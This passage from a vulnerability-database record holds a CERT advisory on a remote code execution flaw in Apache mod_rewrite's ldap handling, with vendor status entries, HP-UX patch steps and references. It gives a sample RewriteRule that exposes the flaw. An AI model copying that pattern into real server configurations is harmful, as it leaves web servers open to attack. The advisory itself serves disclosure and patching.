"http://lists.opensuse.org/opensuse-security-announce/2006-07/msg00019.html", "title": "remote denial of service in apache,apache2", "type": "suse", "cvss": {"score": 7.6, "vector": 
"AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:43:09", "bulletinFamily": "info", "cvelist": ["CVE-2005-3352", "CVE-2005-3357", "CVE-2006-3747"], "description": "### Overview \n\nA vulnerability in a common Apache HTTP server module, `mod_rewrite`, could allow a remote attacker to execute arbitrary code on an affected web server.\n\n### Description \n\nThe [Apache HTTP server](<http://httpd.apache.org/>) distribution includes a number of supplemental [modules](<http://httpd.apache.org/docs/mod/>) that provide additional functionality to the web server. One of these modules, [`mod_rewrite`](<http://httpd.apache.org/docs/mod/mod_rewrite.html>), provides a rule-based rewriting engine to rewrite requested URLs \"on the fly\" based on regular expressions.\n\nAn off-by-one error exists in the `ldap` scheme handling in `mod_rewrite`. For some `RewriteRules`, specifically those where the remote user can influence the beginning of a rewritten URL and that do not include any of the following flags: Forbidden (`F`), Gone (`G`), or NoEscape (`NE`), this could lead to a pointer being written out of bounds. This flaw causes a remotely exploitable vulnerability on web servers that have `mod_rewrite` enabled (configuration directive \"`RewriteEngine on`\") and configured to use certain rules. For example, rules with this format expose the vulnerability: \n \n`RewriteRule fred/(.*) $1` \n \nWhile rules with this format do not expose the vulnerability: \n \n`RewriteRule fred/(.*) joe/$1` \n \nThe versions of the `mod_rewrite` module supplied with the Apache HTTP server versions \n\n\n * 1.3 branch from 1.3.28\n * 2.0 branch from 2.0.46\n * 2.2 branch from 2.2.0\n \nare vulnerable to this issue but earlier versions are not. 
The Apache Software Foundation notes that `mod_rewrite` is not enabled and configured by default; however, it is a commonly used module and may be provided in a vulnerable configuration by redistributors. \n--- \n \n### Impact \n\nAn attacker may be able to execute arbitrary code in the context of the web server user (e.g., \"`apache`\", \"`httpd`\", \"`nobody`\", \"`SYSTEM`\", etc.). The Apache Software Foundation notes that, due to the nature of the underlying flaw, successful exploitation is dependent upon the stack frame layout of Apache running on the target host. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n**Workarounds**\n\n \nDisable `mod_rewrite` if it is not required in your web server configuration. Instructions for doing this can be found in the [Apache HTTP server documentation](<http://httpd.apache.org/docs/>). Sites, particularly those that are not able to apply the patches, are encouraged to implement this workaround. \n \n--- \n \n### Vendor Information\n\n395412\n\n### Apache HTTP Server Project __ Affected\n\nUpdated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Apache project has released httpd versions 1.3.37 (for the 1.3 branch), 2.0.59 (for the 2.0 branch), and 2.2.3 (for the 2.2 branch) in response to this issue. Users are encouraged to upgrade to the appropriate version of the software that contains a fix. 
For more information, see the following Apache announcements:\n\n \n<http://www.apache.org/dist/httpd/Announcement2.2.html> \n<http://www.apache.org/dist/httpd/Announcement2.0.html> \n<http://www.apache.org/dist/httpd/Announcement1.3.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Fedora Project __ Affected\n\nUpdated: July 27, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Vendor statement: Fedora Project \n \nVulnerable \n \nThe ability to exploit this issue is dependent on the stack layout for \na particular compiled version of mod_rewrite. The Fedora project has \nanalyzed Fedora Core 4 and 5 binaries and determined that these \ndistributions are vulnerable to this issue. However this flaw does \nnot affect a default installation of Fedora Core; users who do not \nuse, or have not enabled, the Rewrite module are not affected by this \nissue. \n \nUpdates to correct this issue are available, see \n<http://fedora.redhat.com/Download/updates.html> \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Gentoo Linux __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Gentoo Security Team has published Gentoo Linux Security Advisory [GLSA 200608-01/apache](<http://www.gentoo.org/security/en/glsa/glsa-200608-01.xml>) in response to this issue. 
Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: July 26, 2006 Updated: September 15, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE-----` \n`Hash: SHA1` \n \n`SUPPORT COMMUNICATION - SECURITY BULLETIN` \n \n`Document ID: c00760969` \n \n`Version: 1` \n \n`HPSBUX02145 SSRT061202 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, ` \n`Denial of Service (DoS), and Unauthorized Access` \n \n`NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.` \n \n`Release Date: 2006-08-25` \n`Last Updated: 2006-08-28` \n \n`Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), ` \n`and unauthorized access.` \n \n`Source: Hewlett-Packard Company, HP Software Security Response Team` \n \n`VULNERABILITY SUMMARY` \n`Potential security vulnerabilities have been identified with Apache running on HP-UX. 
` \n`These vulnerabilities could be exploited remotely to allow execution of arbitrary code, ` \n`Denial of Service (DoS), or unauthorized access.` \n \n`References: CVE-2006-3747, CVE-2005-3352, CVE-2005-3357` \n \n`SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.` \n`HP-UX B.11.00, B.11.11, B.11.23 running Apache-based Web Server prior to v.2.0.58.` \n \n`BACKGROUND` \n \n`The following potential security vulnerabilities are resolved in the ` \n`software update listed below:` \n \n`CVE-2006-3747 (cve.mitre.org): Off-by-one error in the ldap scheme handling.` \n`CVE-2005-3352 (cve.mitre.org): mod_ssl NULL pointer dereference.` \n`CVE-2005-3357 (cve.mitre.org): Remote arbitrary code execution.` \n \n`AFFECTED VERSIONS` \n \n`For IPv4:` \n`HP-UX B.11.00` \n`HP-UX B.11.11` \n`===========` \n`hpuxwsAPACHE` \n`action: install revision A.2.0.58.00 or subsequent` \n`action: restart Apache` \n \n`For IPv6:` \n`HP-UX B.11.11` \n`===========` \n`hpuxwsAPACHE,revision=B.1.0.00.01` \n`hpuxwsAPACHE,revision=B.1.0.07.01` \n`hpuxwsAPACHE,revision=B.1.0.08.01` \n`hpuxwsAPACHE,revision=B.1.0.09.01` \n`hpuxwsAPACHE,revision=B.1.0.10.01` \n`hpuxwsAPACHE,revision=B.2.0.48.00` \n`hpuxwsAPACHE,revision=B.2.0.49.00` \n`hpuxwsAPACHE,revision=B.2.0.50.00` \n`hpuxwsAPACHE,revision=B.2.0.51.00` \n`hpuxwsAPACHE,revision=B.2.0.52.00` \n`hpuxwsAPACHE,revision=B.2.0.53.00` \n`hpuxwsAPACHE,revision=B.2.0.54.00` \n`hpuxwsAPACHE,revision=B.2.0.55.00` \n`action: install revision B.2.0.58.00 or subsequent` \n`action: restart Apache` \n \n`HP-UX B.11.23` \n`===========` \n`hpuxwsAPACHE` \n`action: install revision B.2.0.58.00 or subsequent` \n`action: restart Apache` \n \n`END AFFECTED VERSIONS` \n \n`RESOLUTION` \n \n`HP has made the following patches and software updates available to resolve the issue.` \n \n`Software updates for the Apache-based Web Server are available from:` \n \n`<http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/>` 
\n`displayProductInfo.pl?productNumber=HPUXWSSUITE` \n \n`HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server ` \n`v.2.0.58.00 or subsequent.` \n \n`Apache Update Procedure` \n \n`Check for Apache Installation` \n`- ----------------------------` \n`To determine if the Apache web server from HP is installed on your system, ` \n`use Software Distributor's swlist command. All three revisions of the product ` \n`may co-exist on a single system.` \n`For example, the results of the command` \n`swlist -l product | grep -i apache` \n`hpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server` \n \n`Stop Apache` \n`- -------------` \n`Before updating, make sure to stop any previous Apache binary. Otherwise, ` \n`the previous binary will continue running, preventing the new one from starting,` \n`although the installation would be successful. After determining which Apache is ` \n`installed, stop Apache with the following commands:` \n`for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop` \n \n`Download and Install Apache` \n`- ---------------------------` \n`Download Apache from Software Depot:` \n \n`<http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/>` \n`displayProductInfo.pl?productNumber=HPUXWSSUITE` \n \n`Verify successful download by comparing the cksum with the value ` \n`specified on the installation web page.` \n \n`Use SD to swinstall the depot.` \n`Installation of this new revision of HP Apache over an existing HP Apache ` \n`installation is supported, while installation over a non-HP Apache is NOT supported.` \n \n`Removing Apache Installation` \n`- ----------------------------` \n`If you prefer to remove Apache from your system instead of installing a newer revision ` \n`to resolve the security problem, use both Software Distributor's \"swremove\" command ` \n`and also \"rm -rf\" the home location as specified in the rc.config.d file \"HOME\" variables.` \n`%ls /etc/rc.config.d | \\ grep apache hpapache2conf 
hpws_apache[32]conf` \n \n`MANUAL ACTIONS: Yes - Update plus other actions` \n`Install the revision of the product.` \n \n`PRODUCT SPECIFIC INFORMATION` \n`HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all ` \n`HP-issued Security Bulletins to provide a subset of recommended actions that potentially ` \n`affect a specific HP-UX system. For more information: <http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA>` \n \n`HISTORY: rev.1 - 28 August 2006 Initial Release` \n \n`Support: For further information, contact normal HP Services` \n`support channel.` \n \n`Report: To report a potential security vulnerability with any HP` \n`supported product, send Email to: security-alert@hp.com. It is` \n`strongly recommended that security related information being` \n`communicated to HP be encrypted using PGP, especially exploit` \n`information. To get the security-alert PGP key, please send an` \n`e-mail message as follows:` \n` To: security-alert@hp.com` \n` Subject: get key` \n \n`Subscribe: To initiate a subscription to receive future HP` \n`Security Bulletins via Email:` \n`[http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&](<http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&>)` \n`langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC` \n \n`On the web page: ITRC security bulletins and patch sign-up` \n`Under Step1: your ITRC security bulletins and patches` \n` - check ALL categories for which alerts are required and` \n` continue.` \n`Under Step2: your ITRC operating systems` \n` - verify your operating system selections are checked and` \n` save.` \n \n`To update an existing subscription:` \n`<http://h30046.www3.hp.com/subSignIn.php>` \n`Log in on the web page:` \n` Subscriber's choice for Business: sign-in.` \n`On the web page:` \n` Subscriber's Choice: your profile summary` \n` - use Edit Profile to update appropriate sections.` \n \n`To review previously published Security 
Bulletins visit:` \n`<http://www.itrc.hp.com/service/cki/secBullArchive.do>` \n \n`* The Software Product Category that this Security Bulletin` \n`relates to is represented by the 5th and 6th characters of the` \n`Bulletin number in the title:` \n \n` GN = HP General SW,` \n` MA = HP Management Agents,` \n` MI = Misc. 3rd party SW,` \n` MP = HP MPE/iX,` \n` NS = HP NonStop Servers,` \n` OV = HP OpenVMS,` \n` PI = HP Printing & Imaging,` \n` ST = HP Storage SW,` \n` TL = HP Trusted Linux,` \n` TU = HP Tru64 UNIX,` \n` UX = HP-UX,` \n` VV = HP Virtual Vault` \n \n \n`System management and security procedures must be reviewed` \n`frequently to maintain system integrity. HP is continually` \n`reviewing and enhancing the security features of software products` \n`to provide customers with current secure solutions.` \n \n`\"HP is broadly distributing this Security Bulletin in order to` \n`bring to the attention of users of the affected HP products the` \n`important security information contained in this Bulletin. HP` \n`recommends that all users determine the applicability of this` \n`information to their individual situations and take appropriate` \n`action. HP does not warrant that this information is necessarily` \n`accurate or complete for all user situations and, consequently, HP` \n`will not be responsible for any damages resulting from user's use` \n`or disregard of the information provided in this Bulletin. To the` \n`extent permitted by law, HP disclaims all warranties, either` \n`express or implied, including the warranties of merchantability` \n`and fitness for a particular purpose, title and non-infringement.\"` \n \n \n`(c)Copyright 2006 Hewlett-Packard Development Company, L.P.` \n`Hewlett-Packard Company shall not be liable for technical or` \n`editorial errors or omissions contained herein. The information` \n`provided is provided \"as is\" without warranty of any kind. 
To the` \n`extent permitted by law, neither HP nor its affiliates,` \n`subcontractors or suppliers will be liable for incidental, special` \n`or consequential damages including downtime cost; lost profits;` \n`damages relating to the procurement of substitute products or` \n`services; or damages for loss of data, or software restoration.` \n`The information in this document is subject to change without` \n`notice. Hewlett-Packard Company and the names of Hewlett-Packard` \n`products referenced herein are trademarks of Hewlett-Packard` \n`Company in the United States and other countries. Other product` \n`and company names mentioned herein may be trademarks of their` \n`respective owners.` \n`-----BEGIN PGP SIGNATURE-----` \n`Version: PGP 8.1` \n \n`iQA/AwUBRP1TReAfOvwtKn1ZEQLT9ACfWII/AKKvj7mlAZjWvCuL5RR7WjkAn38R` \n`t0wC8YEPUSa3cTZD5UhhZEiW` \n`=30XB` \n`-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Mandriva, Inc. __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMandriva has published Mandriva Linux Security Advisory [MDKSA-2006:133](<http://www.mandriva.com/security/advisories?name=MDKSA-2006:133>) in response to this issue. 
Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### OpenPKG __ Affected\n\nUpdated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe OpenPKG Project has published OpenPKG Security Advisory [OpenPKG-SA-2006.015](<http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.015-apache.html>) in response to this issue. Users are encouraged to review this advisory and apply the patches that it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Oracle Corporation __ Affected\n\nNotified: July 26, 2006 Updated: October 18, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.oracle.com/technology/deploy/security/critical-patch-updates/public_vuln_to_advisory_mapping.html>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### SUSE Linux __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSUSE has published SUSE Security Announcement 
[SUSE-SA:2006:043](<http://www.novell.com/linux/security/advisories/2006_43_apache.html>) in response to this issue. Users are encouraged to review this announcement and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Slackware Linux Inc. __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSlackware has published Slackware Security Advisory [SSA:2006-209-01](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Ubuntu __ Affected\n\nNotified: July 26, 2006 Updated: August 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Ubuntu project has published [Ubuntu Security Notice USN-328-1](<http://www.ubuntu.com/usn/usn-328-1>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### Apple Computer, Inc. 
__ Not Affected\n\nNotified: July 26, 2006 Updated: July 27, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Mac OS X and Mac OS X Server do not contain this vulnerability.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu __ Not Affected\n\nNotified: July 26, 2006 Updated: July 27, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`We are investigating this issue. \nNo affected products have been identified.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi __ Not Affected\n\nNotified: July 26, 2006 Updated: July 31, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Hitachi Web Server does NOT support mod_rewrite module \nofficially and is NOT vulnerable to this issue.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Juniper Networks, Inc. __ Not Affected\n\nNotified: July 26, 2006 Updated: July 27, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Openwall GNU/*/Linux __ Not Affected\n\nNotified: July 26, 2006 Updated: July 31, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Openwall GNU/*/Linux is not vulnerable. We do not currently ship Apache.`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. 
__ Not Affected\n\nUpdated: July 27, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Not vulnerable \n \nThis issue does not affect the version of Apache httpd as supplied with \nRed Hat Enterprise Linux 2.1 \n \nThe ability to exploit this issue is dependent on the stack layout for \na particular compiled version of mod_rewrite. If the compiler has \nadded padding to the stack immediately after the buffer being \noverwritten, this issue can not be exploited, and Apache httpd will \ncontinue operating normally. \n \nThe Red Hat Security Response Team analyzed Red Hat Enterprise Linux 3 \nand Red Hat Enterprise Linux 4 binaries for all architectures as \nshipped by Red Hat and determined that these versions cannot be \nexploited. We therefore do not plan on providing updates for this \nissue. \n \nFor technical details see: \n<https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=200219> \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. 
Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Debian GNU/Linux __ Unknown\n\nNotified: July 26, 2006 Updated: August 03, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe Debian project has published [Debian Security Advisory DSA 1132](<http://www.debian.org/security/2006/dsa-1132>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23395412 Feedback>).\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. 
Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer __ Unknown\n\nNotified: July 26, 2006 Updated: July 27, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\n`For information related to this and other published CERT Advisories that may \nrelate to the IBM eServer Platforms (xSeries, iSeries, pSeries, and zSeries) \nplease go to \n[https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=](<https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=>) \n \nIn order to access this information you will require a Resource Link ID. To \nsubscribe to Resource Link go to \n<http://app-06.www.ibm.com/servers/resourcelink> and follow the steps for \nregistration. \n \nAll questions should be referred to servsec@us.ibm.com. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. 
Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: July 26, 2006 Updated: July 28, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Novell, Inc. 
Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. 
Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. 
Unknown\n\nNotified: July 26, 2006 Updated: July 25, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.apache.org/dist/httpd/Announcement2.2.html>\n * <http://www.apache.org/dist/httpd/Announcement2.0.html>\n * <http://www.apache.org/dist/httpd/Announcement1.3.html>\n * <http://secunia.com/advisories/21197/>\n * <http://secunia.com/advisories/21273/>\n * <http://secunia.com/advisories/21245/>\n * <http://secunia.com/advisories/21266/>\n * <http://secunia.com/advisories/21247/>\n * <http://secunia.com/advisories/21307/>\n * <http://secunia.com/advisories/21315/>\n * <http://secunia.com/advisories/21313/>\n * <http://secunia.com/advisories/21284/>\n * <http://www.niscc.gov.uk/niscc/docs/al-20060728-00515.html?lang=en>\n * <http://jvn.jp/cert/JVNVU%23395412/index.html>\n\n### Acknowledgements\n\nThanks to Mark Cox of the Apache Software Foundation for reporting this vulnerability. 
Mark, in turn, credits Mark Dowd of McAfee AVERT Labs with reporting this issue.\n\nThis document was written by Chad R Dougherty.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3747](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-3747>) \n---|--- \n**Severity Metric:** | 6.48 \n**Date Public:** | 2006-07-27 \n**Date First Published:** | 2006-07-28 \n**Date Last Updated: ** | 2006-10-18 12:52 UTC \n**Document Revision: ** | 43 \n", "modified": "2006-10-18T12:52:00", "published": "2006-07-28T00:00:00", "id": "VU:395412", "href": "https://www.kb.cert.org/vuls/id/395412", "type": "cert", "title": "Apache mod_rewrite contains off-by-one error in ldap scheme handling", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747", "CVE-2006-5752", "CVE-2007-1863", "CVE-2007-3304"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2007-07-02T15:01:38", "published": "2007-07-02T15:01:38", "id": "FEDORA:L62F1CGQ016053", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 5 Update: httpd-2.2.2-1.3", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}]}